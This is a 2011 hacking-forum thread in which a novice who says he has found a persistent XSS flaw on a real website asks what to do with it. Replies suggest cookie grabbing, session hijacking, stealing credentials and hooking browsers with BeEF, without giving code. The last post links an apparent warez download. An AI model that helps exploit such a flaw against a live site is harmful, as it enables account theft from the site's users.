EvilZone

Hacking and Security => Hacking and Security => : PiZZ4 September 11, 2011, 09:14:48 PM

: XSS Vulnerability Question
: PiZZ4 September 11, 2011, 09:14:48 PM: I'm sort of a noob when it comes to XSS vulnerabilities, so here is a noob question:

Lets say if you have found a xss vulnerability on a website, what can you do with it?
: Re: XSS Vulnerability Question
: Kulverstukas September 11, 2011, 09:32:39 PM: I guess nothing. Unless it's an persistent one.
: Re: XSS Vulnerability Question
: Satori September 11, 2011, 09:54:22 PM: : Kulverstukas September 11, 2011, 09:32:39 PM
I guess nothing. Unless it's an persistent one.
And this isnt true.
You could make a cookie grabber and send the xxs vulnerable link to victims for example.
: Re: XSS Vulnerability Question
: ca0s September 11, 2011, 10:01:38 PM: You can do whatever you want. Exploit a browser bug, steal credentials, use browsers as zombies.
If is persistent, so much easier. If not, also exploitable (more likely targeted attacks).
For an example, look for the Beef framework.
: Re: XSS Vulnerability Question
: gh0st September 11, 2011, 10:25:18 PM: you can steal the credentials of some1 if he/she clicks the link or visit the exploit
http://www.youtube.com/watch?v=WZCXIrW0xZ0 (http://www.youtube.com/watch?v=WZCXIrW0xZ0)
http://www.youtube.com/watch?v=JBpG2fie_aA&feature=related (http://www.youtube.com/watch?v=JBpG2fie_aA&feature=related)
thanx to infinity exists
I know a bit the teory but Ive never done it before
: Re: XSS Vulnerability Question
: FuyuKitsune September 12, 2011, 01:41:19 AM: Insert Javascript to the page. Sometimes it's a bit difficult with the filters, basic PHP filters may require some code maneuvering, but it's easy enough to run Javascript or link to a JS file. Last time I did an XSS I did JS to change the background image to a dancing banana.
: Re: XSS Vulnerability Question
: PiZZ4 September 13, 2011, 05:49:05 PM: : ca0s September 11, 2011, 10:01:38 PM
You can do whatever you want. Exploit a browser bug, steal credentials, use browsers as zombies.
If is persistent, so much easier. If not, also exploitable (more likely targeted attacks).
For an example, look for the Beef framework.

It's defiantly persistent, I've double checked just to make sure it was.

[/quote]Insert Javascript to the page. Sometimes it's a bit difficult with the filters, basic PHP filters may require some code maneuvering, but it's easy enough to run Javascript or link to a JS file. Last time I did an XSS I did JS to change the background image to a dancing banana.[/quote]

Now that is interesting, I guess I'll have to look into that.
: Re: XSS Vulnerability Question
: FuyuKitsune September 13, 2011, 06:30:07 PM: : PiZZ4 September 13, 2011, 05:49:05 PM
Now that is interesting, I guess I'll have to look into that.
It has to be a .js file. I spend a long time screwing up because I was trying to run .txt extensions and extensionless files in HTML.
: Re: XSS Vulnerability Question
: iMorg September 14, 2011, 09:02:02 AM: Session Hijacking.
: Re: XSS Vulnerability Question
: ande September 14, 2011, 02:40:23 PM: : iMorg September 14, 2011, 09:02:02 AM
Session Hijacking.

That would be the same as cookie grabbing.
: Re: XSS Vulnerability Question
: noob September 14, 2011, 04:50:48 PM: :
http://rapidshare.com/files/129854305/www_GoonWarez_com_1213375552.zip
(http://books.gigaimg.com/avaxhome/avaxhome/2007-05-12/1597491543.jpg)